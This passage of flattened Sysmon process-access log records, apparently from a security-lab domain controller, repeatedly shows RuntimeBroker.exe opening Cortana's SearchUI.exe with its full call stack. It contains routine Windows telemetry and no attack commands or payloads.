12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 